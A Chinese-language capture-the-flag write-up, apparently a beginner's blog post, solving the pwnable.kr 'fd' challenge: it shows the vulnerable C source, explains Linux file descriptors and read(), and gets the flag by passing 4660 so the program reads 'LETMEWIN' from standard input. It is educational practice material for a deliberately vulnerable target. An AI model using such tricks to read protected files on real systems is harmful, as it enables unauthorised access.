分析

首先连上ssh,

1
ls -al

查看一下各个文件的权限,这里可以发现flag文件是没有权限看的,但是有对fd.c的读取权限的:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
fd@ubuntu:~$ cat fd.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char buf[32];
int main(int argc, char* argv[], char* envp[]){
if(argc<2){
printf("pass argv[1] a number\n");
return 0;
}
int fd = atoi( argv[1] ) - 0x1234;
int len = 0;
len = read(fd, buf, 32);
if(!strcmp("LETMEWIN\n", buf)){
printf("good job :)\n");
system("/bin/cat flag");
exit(0);
}
printf("learn about Linux file IO\n");
return 0;

}

对于一个pwn菜鸡来说,各种看不懂,首先接触到的是c的命令行参数
这个很容易学,然后仔细看看代码,找到能输出flag的语句,
然后一直往上跟踪,发现当buf等于LETMEWIN\n时,输出flag
但是现在怎么控制buf的值是一个问题,找到前面的read函数,能控制buf的值
read函数介绍

1
2
3
4
5
6
 read()函数
read(int fd, void *buf, size_t count);
参数:
fd: 将要读取数据的文件描述词。
buf:指缓冲区,即读取的数据会被放到这个缓冲区中去。
count: 表示调用一次read操作,应该读多少数量的字符。

先来解释一下linux下的文件修饰符,简单来说就是:

1
2
3
0 输入 stdin
1 输出 stdout
2 错误 stderr

我们需要的是fd为0,使其可以输入LETMEWIN放到buf里,
然后再往上看到fd,决定fd值的是我们传入的argv[],到这就很简单了,
将argv[1]的值传入为0x1234,也就是4660,

pwn

很简单,

1
2
./fd 4660
然后输出LETMEWIN,回车